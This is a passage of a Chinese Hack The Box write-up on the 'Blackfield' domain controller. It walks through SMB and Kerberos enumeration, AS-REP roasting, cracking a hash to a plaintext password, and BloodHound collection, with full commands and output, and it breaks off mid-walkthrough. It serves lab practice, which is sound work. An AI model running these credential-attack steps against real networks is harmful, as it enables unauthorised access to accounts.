title: Hack The Box - blackfield(卷影副本转储散列哈希) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
If you want to climb the peak, not the rainbow as a ladder.
如果你想攀登高峰,切莫把彩虹当作梯子。
Hack The Box - blackfield:
# Nmap 7.92 scan initiated Fri Apr 22 22:52:15 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.26s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-22 22:03:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2022-04-22T22:04:30
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 22 23:05:14 2022 -- 1 IP address (1 host up) scanned in 778.49 secondsDNS:
Nmap为我枚举到了一些端口信息,还有一个域,正如该靶机的名字一样,BLACKFIELD.local0,为什么后边有个0,我可以试着去验证一下:
$ dig 10.10.10.192 BLACKFIELD.local
; <<>> DiG 9.18.0-2-Debian <<>> 10.10.10.192 BLACKFIELD.local
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 22432
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;10.10.10.192. IN A
;; Query time: 4 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Fri Apr 22 23:09:27 CST 2022
;; MSG SIZE rcvd: 41
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39765
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 84e1372c44b5b53c7103d16d6262c57586faa8e2fe3ccbf5 (good)
;; QUESTION SECTION:
;BLACKFIELD.local. IN A
;; AUTHORITY SECTION:
. 1800 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022042200 1800 900 604800 86400
;; Query time: 24 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Fri Apr 22 23:09:27 CST 2022
;; MSG SIZE rcvd: 148看起来有0没0一样的,我可以尝试目标是否允许匿名区域传输,尽管我从来没成功过,可我每次都想试试它,因为如若成功,它的回报会很吸引人:
$ dig axfr @10.10.10.192 BLACKFIELD.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.192 BLACKFIELD.local
; (1 server found)
;; global options: +cmd
; Transfer failed.不出意外的不可以。
RPC:
88kerberos枚举能供我参考的信息太少,暂时先不考虑吧,我觉得当下收集更多的用户信息会更有帮助:
$ rpcclient -U "" 10.10.10.192 -N
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 好吧RPC也不行。
SMB:
Crackmapexec 是一种后期利用工具,可帮助自动执行一些任务,例如密码喷洒、枚举共享、验证本地管理员访问权限、在目标机器上执行命令等等。默认情况下它会识别操作系统、主机名、域名、SMB 版本以及是否启用了 SMB 签名。kalinux默认集成:
$ crackmapexec smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)Windows 10.0 Build 17763 x64是windows2019系统。我可以查看一些smb共享信息:
$ smbclient -N -L //10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available看起来它并不希望我访问一些默认共享:
$ smbclient //10.10.10.192/NETLOGON
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit$ smbclient //10.10.10.192/SYSVOL
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> DIR
NT_STATUS_ACCESS_DENIED listing \*
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 那非默认的smb共享,只有一个forensic和profiles$:
$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^Cforensic我暂时也访问不了,profiles$倒是允许我访问,但是它似乎过于热情了:
$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\worldisend's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
AAlleni D 0 Thu Jun 4 00:47:11 2020
ABarteski D 0 Thu Jun 4 00:47:11 2020
ABekesz D 0 Thu Jun 4 00:47:11 2020
ABenzies D 0 Thu Jun 4 00:47:11 2020
ABiemiller D 0 Thu Jun 4 00:47:11 2020
AChampken D 0 Thu Jun 4 00:47:11 2020
ACheretei D 0 Thu Jun 4 00:47:11 2020
ACsonaki D 0 Thu Jun 4 00:47:11 2020
AHigchens D 0 Thu Jun 4 00:47:11 2020
AJaquemai D 0 Thu Jun 4 00:47:11 2020
AKlado D 0 Thu Jun 4 00:47:11 2020
AKoffenburger D 0 Thu Jun 4 00:47:11 2020
AKollolli D 0 Thu Jun 4 00:47:11 2020
AKruppe D 0 Thu Jun 4 00:47:11 2020
AKubale D 0 Thu Jun 4 00:47:11 2020
ALamerz D 0 Thu Jun 4 00:47:11 2020
AMaceldon D 0 Thu Jun 4 00:47:11 2020
AMasalunga D 0 Thu Jun 4 00:47:11 2020
ANavay D 0 Thu Jun 4 00:47:11 2020
ANesterova D 0 Thu Jun 4 00:47:11 2020
ANeusse D 0 Thu Jun 4 00:47:11 2020
AOkleshen D 0 Thu Jun 4 00:47:11 2020
APustulka D 0 Thu Jun 4 00:47:11 2020
ARotella D 0 Thu Jun 4 00:47:11 2020
ASanwardeker D 0 Thu Jun 4 00:47:11 2020
AShadaia D 0 Thu Jun 4 00:47:11 2020
ASischo D 0 Thu Jun 4 00:47:11 2020
ASpruce D 0 Thu Jun 4 00:47:11 2020
ATakach D 0 Thu Jun 4 00:47:11 2020
ATaueg D 0 Thu Jun 4 00:47:11 2020
ATwardowski D 0 Thu Jun 4 00:47:11 2020
audit2020 D 0 Thu Jun 4 00:47:11 2020
AWangenheim D 0 Thu Jun 4 00:47:11 2020
AWorsey D 0 Thu Jun 4 00:47:11 2020
AZigmunt D 0 Thu Jun 4 00:47:11 2020
BBakajza D 0 Thu Jun 4 00:47:11 2020
BBeloucif D 0 Thu Jun 4 00:47:11 2020
BCarmitcheal D 0 Thu Jun 4 00:47:11 2020
BConsultant D 0 Thu Jun 4 00:47:11 2020
BErdossy D 0 Thu Jun 4 00:47:11 2020
BGeminski D 0 Thu Jun 4 00:47:11 2020
BLostal D 0 Thu Jun 4 00:47:11 2020
BMannise D 0 Thu Jun 4 00:47:11 2020
BNovrotsky D 0 Thu Jun 4 00:47:11 2020
BRigiero D 0 Thu Jun 4 00:47:11 2020
BSamkoses D 0 Thu Jun 4 00:47:11 2020
BZandonella D 0 Thu Jun 4 00:47:11 2020
CAcherman D 0 Thu Jun 4 00:47:12 2020
CAkbari D 0 Thu Jun 4 00:47:12 2020
CAldhowaihi D 0 Thu Jun 4 00:47:12 2020
CArgyropolous D 0 Thu Jun 4 00:47:12 2020
CDufrasne D 0 Thu Jun 4 00:47:12 2020
CGronk D 0 Thu Jun 4 00:47:11 2020
Chiucarello D 0 Thu Jun 4 00:47:11 2020
Chiuccariello D 0 Thu Jun 4 00:47:12 2020
CHoytal D 0 Thu Jun 4 00:47:12 2020
CKijauskas D 0 Thu Jun 4 00:47:12 2020
CKolbo D 0 Thu Jun 4 00:47:12 2020
CMakutenas D 0 Thu Jun 4 00:47:12 2020
CMorcillo D 0 Thu Jun 4 00:47:11 2020
CSchandall D 0 Thu Jun 4 00:47:12 2020
CSelters D 0 Thu Jun 4 00:47:12 2020
CTolmie D 0 Thu Jun 4 00:47:12 2020
DCecere D 0 Thu Jun 4 00:47:12 2020
DChintalapalli D 0 Thu Jun 4 00:47:12 2020
DCwilich D 0 Thu Jun 4 00:47:12 2020
DGarbatiuc D 0 Thu Jun 4 00:47:12 2020
DKemesies D 0 Thu Jun 4 00:47:12 2020
DMatuka D 0 Thu Jun 4 00:47:12 2020
DMedeme D 0 Thu Jun 4 00:47:12 2020
DMeherek D 0 Thu Jun 4 00:47:12 2020
DMetych D 0 Thu Jun 4 00:47:12 2020
DPaskalev D 0 Thu Jun 4 00:47:12 2020
DPriporov D 0 Thu Jun 4 00:47:12 2020
DRusanovskaya D 0 Thu Jun 4 00:47:12 2020
DVellela D 0 Thu Jun 4 00:47:12 2020
DVogleson D 0 Thu Jun 4 00:47:12 2020
DZwinak D 0 Thu Jun 4 00:47:12 2020
EBoley D 0 Thu Jun 4 00:47:12 2020
EEulau D 0 Thu Jun 4 00:47:12 2020
EFeatherling D 0 Thu Jun 4 00:47:12 2020
EFrixione D 0 Thu Jun 4 00:47:12 2020
EJenorik D 0 Thu Jun 4 00:47:12 2020
EKmilanovic D 0 Thu Jun 4 00:47:12 2020
ElKatkowsky D 0 Thu Jun 4 00:47:12 2020
EmaCaratenuto D 0 Thu Jun 4 00:47:12 2020
EPalislamovic D 0 Thu Jun 4 00:47:12 2020
EPryar D 0 Thu Jun 4 00:47:12 2020
ESachhitello D 0 Thu Jun 4 00:47:12 2020
ESariotti D 0 Thu Jun 4 00:47:12 2020
ETurgano D 0 Thu Jun 4 00:47:12 2020
EWojtila D 0 Thu Jun 4 00:47:12 2020
FAlirezai D 0 Thu Jun 4 00:47:12 2020
FBaldwind D 0 Thu Jun 4 00:47:12 2020
FBroj D 0 Thu Jun 4 00:47:12 2020
FDeblaquire D 0 Thu Jun 4 00:47:12 2020
FDegeorgio D 0 Thu Jun 4 00:47:12 2020
FianLaginja D 0 Thu Jun 4 00:47:12 2020
FLasokowski D 0 Thu Jun 4 00:47:12 2020
FPflum D 0 Thu Jun 4 00:47:12 2020
FReffey D 0 Thu Jun 4 00:47:12 2020
GaBelithe D 0 Thu Jun 4 00:47:12 2020
Gareld D 0 Thu Jun 4 00:47:12 2020
GBatowski D 0 Thu Jun 4 00:47:12 2020
GForshalger D 0 Thu Jun 4 00:47:12 2020
GGomane D 0 Thu Jun 4 00:47:12 2020
GHisek D 0 Thu Jun 4 00:47:12 2020
GMaroufkhani D 0 Thu Jun 4 00:47:12 2020
GMerewether D 0 Thu Jun 4 00:47:12 2020
GQuinniey D 0 Thu Jun 4 00:47:12 2020
GRoswurm D 0 Thu Jun 4 00:47:12 2020
GWiegard D 0 Thu Jun 4 00:47:12 2020
HBlaziewske D 0 Thu Jun 4 00:47:12 2020
HColantino D 0 Thu Jun 4 00:47:12 2020
HConforto D 0 Thu Jun 4 00:47:12 2020
HCunnally D 0 Thu Jun 4 00:47:12 2020
HGougen D 0 Thu Jun 4 00:47:12 2020
HKostova D 0 Thu Jun 4 00:47:12 2020
IChristijr D 0 Thu Jun 4 00:47:12 2020
IKoledo D 0 Thu Jun 4 00:47:12 2020
IKotecky D 0 Thu Jun 4 00:47:12 2020
ISantosi D 0 Thu Jun 4 00:47:12 2020
JAngvall D 0 Thu Jun 4 00:47:12 2020
JBehmoiras D 0 Thu Jun 4 00:47:12 2020
JDanten D 0 Thu Jun 4 00:47:12 2020
JDjouka D 0 Thu Jun 4 00:47:12 2020
JKondziola D 0 Thu Jun 4 00:47:12 2020
JLeytushsenior D 0 Thu Jun 4 00:47:12 2020
JLuthner D 0 Thu Jun 4 00:47:12 2020
JMoorehendrickson D 0 Thu Jun 4 00:47:12 2020
JPistachio D 0 Thu Jun 4 00:47:12 2020
JScima D 0 Thu Jun 4 00:47:12 2020
JSebaali D 0 Thu Jun 4 00:47:12 2020
JShoenherr D 0 Thu Jun 4 00:47:12 2020
JShuselvt D 0 Thu Jun 4 00:47:12 2020
KAmavisca D 0 Thu Jun 4 00:47:12 2020
KAtolikian D 0 Thu Jun 4 00:47:12 2020
KBrokinn D 0 Thu Jun 4 00:47:12 2020
KCockeril D 0 Thu Jun 4 00:47:12 2020
KColtart D 0 Thu Jun 4 00:47:12 2020
KCyster D 0 Thu Jun 4 00:47:12 2020
KDorney D 0 Thu Jun 4 00:47:12 2020
KKoesno D 0 Thu Jun 4 00:47:12 2020
KLangfur D 0 Thu Jun 4 00:47:12 2020
KMahalik D 0 Thu Jun 4 00:47:12 2020
KMasloch D 0 Thu Jun 4 00:47:12 2020
KMibach D 0 Thu Jun 4 00:47:12 2020
KParvankova D 0 Thu Jun 4 00:47:12 2020
KPregnolato D 0 Thu Jun 4 00:47:12 2020
KRasmor D 0 Thu Jun 4 00:47:12 2020
KShievitz D 0 Thu Jun 4 00:47:12 2020
KSojdelius D 0 Thu Jun 4 00:47:12 2020
KTambourgi D 0 Thu Jun 4 00:47:12 2020
KVlahopoulos D 0 Thu Jun 4 00:47:12 2020
KZyballa D 0 Thu Jun 4 00:47:12 2020
LBajewsky D 0 Thu Jun 4 00:47:12 2020
LBaligand D 0 Thu Jun 4 00:47:12 2020
LBarhamand D 0 Thu Jun 4 00:47:12 2020
LBirer D 0 Thu Jun 4 00:47:12 2020
LBobelis D 0 Thu Jun 4 00:47:12 2020
LChippel D 0 Thu Jun 4 00:47:12 2020
LChoffin D 0 Thu Jun 4 00:47:12 2020
LCominelli D 0 Thu Jun 4 00:47:12 2020
LDruge D 0 Thu Jun 4 00:47:12 2020
LEzepek D 0 Thu Jun 4 00:47:12 2020
LHyungkim D 0 Thu Jun 4 00:47:12 2020
LKarabag D 0 Thu Jun 4 00:47:12 2020
LKirousis D 0 Thu Jun 4 00:47:12 2020
LKnade D 0 Thu Jun 4 00:47:12 2020
LKrioua D 0 Thu Jun 4 00:47:12 2020
LLefebvre D 0 Thu Jun 4 00:47:12 2020
LLoeradeavilez D 0 Thu Jun 4 00:47:12 2020
LMichoud D 0 Thu Jun 4 00:47:12 2020
LTindall D 0 Thu Jun 4 00:47:12 2020
LYturbe D 0 Thu Jun 4 00:47:12 2020
MArcynski D 0 Thu Jun 4 00:47:12 2020
MAthilakshmi D 0 Thu Jun 4 00:47:12 2020
MAttravanam D 0 Thu Jun 4 00:47:12 2020
MBrambini D 0 Thu Jun 4 00:47:12 2020
MHatziantoniou D 0 Thu Jun 4 00:47:12 2020
MHoerauf D 0 Thu Jun 4 00:47:12 2020
MKermarrec D 0 Thu Jun 4 00:47:12 2020
MKillberg D 0 Thu Jun 4 00:47:12 2020
MLapesh D 0 Thu Jun 4 00:47:12 2020
MMakhsous D 0 Thu Jun 4 00:47:12 2020
MMerezio D 0 Thu Jun 4 00:47:12 2020
MNaciri D 0 Thu Jun 4 00:47:12 2020
MShanmugarajah D 0 Thu Jun 4 00:47:12 2020
MSichkar D 0 Thu Jun 4 00:47:12 2020
MTemko D 0 Thu Jun 4 00:47:12 2020
MTipirneni D 0 Thu Jun 4 00:47:12 2020
MTonuri D 0 Thu Jun 4 00:47:12 2020
MVanarsdel D 0 Thu Jun 4 00:47:12 2020
NBellibas D 0 Thu Jun 4 00:47:12 2020
NDikoka D 0 Thu Jun 4 00:47:12 2020
NGenevro D 0 Thu Jun 4 00:47:12 2020
NGoddanti D 0 Thu Jun 4 00:47:12 2020
NMrdirk D 0 Thu Jun 4 00:47:12 2020
NPulido D 0 Thu Jun 4 00:47:12 2020
NRonges D 0 Thu Jun 4 00:47:12 2020
NSchepkie D 0 Thu Jun 4 00:47:12 2020
NVanpraet D 0 Thu Jun 4 00:47:12 2020
OBelghazi D 0 Thu Jun 4 00:47:12 2020
OBushey D 0 Thu Jun 4 00:47:12 2020
OHardybala D 0 Thu Jun 4 00:47:12 2020
OLunas D 0 Thu Jun 4 00:47:12 2020
ORbabka D 0 Thu Jun 4 00:47:12 2020
PBourrat D 0 Thu Jun 4 00:47:12 2020
PBozzelle D 0 Thu Jun 4 00:47:12 2020
PBranti D 0 Thu Jun 4 00:47:12 2020
PCapperella D 0 Thu Jun 4 00:47:12 2020
PCurtz D 0 Thu Jun 4 00:47:12 2020
PDoreste D 0 Thu Jun 4 00:47:12 2020
PGegnas D 0 Thu Jun 4 00:47:12 2020
PMasulla D 0 Thu Jun 4 00:47:12 2020
PMendlinger D 0 Thu Jun 4 00:47:12 2020
PParakat D 0 Thu Jun 4 00:47:12 2020
PProvencer D 0 Thu Jun 4 00:47:12 2020
PTesik D 0 Thu Jun 4 00:47:12 2020
PVinkovich D 0 Thu Jun 4 00:47:12 2020
PVirding D 0 Thu Jun 4 00:47:12 2020
PWeinkaus D 0 Thu Jun 4 00:47:12 2020
RBaliukonis D 0 Thu Jun 4 00:47:12 2020
RBochare D 0 Thu Jun 4 00:47:12 2020
RKrnjaic D 0 Thu Jun 4 00:47:12 2020
RNemnich D 0 Thu Jun 4 00:47:12 2020
RPoretsky D 0 Thu Jun 4 00:47:12 2020
RStuehringer D 0 Thu Jun 4 00:47:12 2020
RSzewczuga D 0 Thu Jun 4 00:47:12 2020
RVallandas D 0 Thu Jun 4 00:47:12 2020
RWeatherl D 0 Thu Jun 4 00:47:12 2020
RWissor D 0 Thu Jun 4 00:47:12 2020
SAbdulagatov D 0 Thu Jun 4 00:47:12 2020
SAjowi D 0 Thu Jun 4 00:47:12 2020
SAlguwaihes D 0 Thu Jun 4 00:47:12 2020
SBonaparte D 0 Thu Jun 4 00:47:12 2020
SBouzane D 0 Thu Jun 4 00:47:12 2020
SChatin D 0 Thu Jun 4 00:47:12 2020
SDellabitta D 0 Thu Jun 4 00:47:12 2020
SDhodapkar D 0 Thu Jun 4 00:47:12 2020
SEulert D 0 Thu Jun 4 00:47:12 2020
SFadrigalan D 0 Thu Jun 4 00:47:12 2020
SGolds D 0 Thu Jun 4 00:47:12 2020
SGrifasi D 0 Thu Jun 4 00:47:12 2020
SGtlinas D 0 Thu Jun 4 00:47:12 2020
SHauht D 0 Thu Jun 4 00:47:12 2020
SHederian D 0 Thu Jun 4 00:47:12 2020
SHelregel D 0 Thu Jun 4 00:47:12 2020
SKrulig D 0 Thu Jun 4 00:47:12 2020
SLewrie D 0 Thu Jun 4 00:47:12 2020
SMaskil D 0 Thu Jun 4 00:47:12 2020
Smocker D 0 Thu Jun 4 00:47:12 2020
SMoyta D 0 Thu Jun 4 00:47:12 2020
SRaustiala D 0 Thu Jun 4 00:47:12 2020
SReppond D 0 Thu Jun 4 00:47:12 2020
SSicliano D 0 Thu Jun 4 00:47:12 2020
SSilex D 0 Thu Jun 4 00:47:12 2020
SSolsbak D 0 Thu Jun 4 00:47:12 2020
STousignaut D 0 Thu Jun 4 00:47:12 2020
support D 0 Thu Jun 4 00:47:12 2020
svc_backup D 0 Thu Jun 4 00:47:12 2020
SWhyte D 0 Thu Jun 4 00:47:12 2020
SWynigear D 0 Thu Jun 4 00:47:12 2020
TAwaysheh D 0 Thu Jun 4 00:47:12 2020
TBadenbach D 0 Thu Jun 4 00:47:12 2020
TCaffo D 0 Thu Jun 4 00:47:12 2020
TCassalom D 0 Thu Jun 4 00:47:12 2020
TEiselt D 0 Thu Jun 4 00:47:12 2020
TFerencdo D 0 Thu Jun 4 00:47:12 2020
TGaleazza D 0 Thu Jun 4 00:47:12 2020
TKauten D 0 Thu Jun 4 00:47:12 2020
TKnupke D 0 Thu Jun 4 00:47:12 2020
TLintlop D 0 Thu Jun 4 00:47:12 2020
TMusselli D 0 Thu Jun 4 00:47:12 2020
TOust D 0 Thu Jun 4 00:47:12 2020
TSlupka D 0 Thu Jun 4 00:47:12 2020
TStausland D 0 Thu Jun 4 00:47:12 2020
TZumpella D 0 Thu Jun 4 00:47:12 2020
UCrofskey D 0 Thu Jun 4 00:47:12 2020
UMarylebone D 0 Thu Jun 4 00:47:12 2020
UPyrke D 0 Thu Jun 4 00:47:12 2020
VBublavy D 0 Thu Jun 4 00:47:12 2020
VButziger D 0 Thu Jun 4 00:47:12 2020
VFuscca D 0 Thu Jun 4 00:47:12 2020
VLitschauer D 0 Thu Jun 4 00:47:12 2020
VMamchuk D 0 Thu Jun 4 00:47:12 2020
VMarija D 0 Thu Jun 4 00:47:12 2020
VOlaosun D 0 Thu Jun 4 00:47:12 2020
VPapalouca D 0 Thu Jun 4 00:47:12 2020
WSaldat D 0 Thu Jun 4 00:47:12 2020
WVerzhbytska D 0 Thu Jun 4 00:47:12 2020
WZelazny D 0 Thu Jun 4 00:47:12 2020
XBemelen D 0 Thu Jun 4 00:47:12 2020
XDadant D 0 Thu Jun 4 00:47:12 2020
XDebes D 0 Thu Jun 4 00:47:12 2020
XKonegni D 0 Thu Jun 4 00:47:12 2020
XRykiel D 0 Thu Jun 4 00:47:12 2020
YBleasdale D 0 Thu Jun 4 00:47:12 2020
YHuftalin D 0 Thu Jun 4 00:47:12 2020
YKivlen D 0 Thu Jun 4 00:47:12 2020
YKozlicki D 0 Thu Jun 4 00:47:12 2020
YNyirenda D 0 Thu Jun 4 00:47:12 2020
YPredestin D 0 Thu Jun 4 00:47:12 2020
YSeturino D 0 Thu Jun 4 00:47:12 2020
YSkoropada D 0 Thu Jun 4 00:47:12 2020
YVonebers D 0 Thu Jun 4 00:47:12 2020
YZarpentine D 0 Thu Jun 4 00:47:12 2020
ZAlatti D 0 Thu Jun 4 00:47:12 2020
ZKrenselewski D 0 Thu Jun 4 00:47:12 2020
ZMalaab D 0 Thu Jun 4 00:47:12 2020
ZMiick D 0 Thu Jun 4 00:47:12 2020
ZScozzari D 0 Thu Jun 4 00:47:12 2020
ZTimofeeff D 0 Thu Jun 4 00:47:12 2020
ZWausik D 0 Thu Jun 4 00:47:12 2020
5102079 blocks of size 4096. 1683487 blocks available
smb: \> 但是这些目录中都是空的:
smb: \> cd ZWausik\
smb: \ZWausik\> s
s: command abbreviation ambiguous
smb: \ZWausik\> dir
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
5102079 blocks of size 4096. 1683359 blocks available
smb: \ZWausik\> cd ..
smb: \> cd ZMiick\
smb: \ZMiick\> dir
. D 0 Thu Jun 4 00:47:12 2020
.. D 0 Thu Jun 4 00:47:12 2020
5102079 blocks of size 4096. 1683355 blocks available
smb: \ZMiick\> 而且很奇怪,这些目录名像是人名,因为KAmavisca是翻译不出来的,但是Amavisca翻译软件会告诉我这是一个人名,我可以试试,将其复制下来做成字典,用于kerberos枚举用户名。
我可以先尝试将其挂载到本地mnt目录,该功能需要切换root:
$ su root
密码:
# mount -t cifs //10.10.10.192/profiles$ /mnt
Password for worldisend@//10.10.10.192/profiles$: 
$ touch user.txt
$ sudo ls -1 /mnt/ > user.txt
$ cat user.txt
AAlleni
ABarteski
..........这样我就可以获取一个用户名字典。
kerberos枚举:
那么接下来我可以通过kerbrute枚举用户名:
$ sudo ./kerbrute userenum -d blackfield.local ./user.txt --dc 10.10.10.192
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/23/22 - Ronnie Flathers @ropnop
2022/04/23 00:09:35 > Using KDC(s):
2022/04/23 00:09:35 > 10.10.10.192:88
2022/04/23 00:09:58 > [+] VALID USERNAME: audit2020@blackfield.local
2022/04/23 00:12:08 > [+] VALID USERNAME: support@blackfield.local
2022/04/23 00:12:08 > [+] VALID USERNAME: svc_backup@blackfield.local
2022/04/23 00:12:40 > Done! Tested 314 usernames (3 valid) in 184.849 seconds我可以进一步提取信息:
audit2020
support
svc_backup我可以/impacket-0.9.24/examples/GetNPUsers.py来枚举这些用户的hash:
$ ./posttool/impacket-0.9.24/examples/GetNPUsers.py 'blackfield.local/' -usersfile ./user.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set我成功获取到了support用户的hash:
$ cat hashes.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:5854f53c662b7bb4e4a4cdfd7ebc05d4$4aac3b42f477d32a10ef1fa40e8ede2cb818b3f4a5562c2f348aefb1d1a913119bcc9b4f836598a3afba64a2a17e227043ddcee34ac8e6667cc4ca8d3e8f6dd3a861fc2084d5f46a4754c41c551716473bdee459abe64164ddd1d1758a4b977fb98a9b71e5493f8297a064125cff6fce8aa1c106d6aed6f1441093ac9c8a0cb8deef3dce2583dae8b27e9580a3a2831df29925a1ccb428e42d360aa02b4f483aee94cf8ec118335865bde6ff6aee9d86da08781b00fe77dc40b1db6f45589f9ae63e3c063c7ec5a7411c0534d583719e8a50a3708e84d6a5008dd151d8100afa4baf094d72b86cdb95f6ea08a2845c4772608a20我可以尝试用hashcat破解:
$ hashcat -h | grep "AS-REP"
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol$ hashcat -m 18200 ./hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
......
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5asrep$23$support@BLACKFIELD.LOCAL:5854f53c662b7bb4e4a4cdfd7ebc05d4$4aac3b42f477d32a10ef1fa40e8ede2cb818b3f4a5562c2f348aefb1d1a913119bcc9b4f836598a3afba64a2a17e227043ddcee34ac8e6667cc4ca8d3e8f6dd3a861fc2084d5f46a4754c41c551716473bdee459abe64164ddd1d1758a4b977fb98a9b71e5493f8297a064125cff6fce8aa1c106d6aed6f1441093ac9c8a0cb8deef3dce2583dae8b27e9580a3a2831df29925a1ccb428e42d360aa02b4f483aee94cf8ec118335865bde6ff6aee9d86da08781b00fe77dc40b1db6f45589f9ae63e3c063c7ec5a7411c0534d583719e8a50a3708e84d6a5008dd151d8100afa4baf094d72b86cdb95f6ea08a2845c4772608a20:#00^BlackKnight
......
Started: Sat Apr 23 00:20:55 2022
Stopped: Sat Apr 23 00:21:16 2022继续枚举smb:
我得到了support用户的密码 #00^BlackKnight,但它似乎不是让我用来登录的:
$ evil-winrm -i 10.10.10.192 -u support -p '#00^BlackKnight'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
ls
dir而且似乎也不允许我以该身份去访问一些东西:
$ smbclient //10.10.10.192/forensic -U support%#00^BlackKnight
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 好吧,我还是可以访问到一些最开始的限制目录:
$ smbclient //10.10.10.192/SYSVOL -U support%#00^BlackKnight
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 19:13:05 2020
.. D 0 Sun Feb 23 19:13:05 2020
BLACKFIELD.local Dr 0 Sun Feb 23 19:13:05 2020
5102079 blocks of size 4096. 1683607 blocks available
smb: \> cd BLACKFIELD.local\
smb: \BLACKFIELD.local\> DIR
. D 0 Sun Feb 23 19:19:28 2020
.. D 0 Sun Feb 23 19:19:28 2020
DfsrPrivate DHSr 0 Sun Feb 23 19:19:28 2020
Policies D 0 Sun Feb 23 19:13:14 2020
scripts D 0 Sun Feb 23 19:13:05 2020
5102079 blocks of size 4096. 1683575 blocks available但其中包含的文件似乎对我一点帮助都没有,而且有些目录中还是不允许我执行 dir 遍历命令,我尝试以当前身份去请求一个服务票据,如果能请求成功,或许我可以破解服务账户的凭证密码,但是看起来不行:
$ ./GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
No entries found!枚举域信息:
但是,我发现了一个BloodHound 注入器 BloodHound.py,它可以指定用户登录凭证远程对目标域进行嗅探:
$ ./bloodhound.py -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
......运行完毕后会在当前目录生成对应的json文件:
$ mkdir ../../../json
$ mv 20* ../../../json
$ cd ../../../json
$ ls
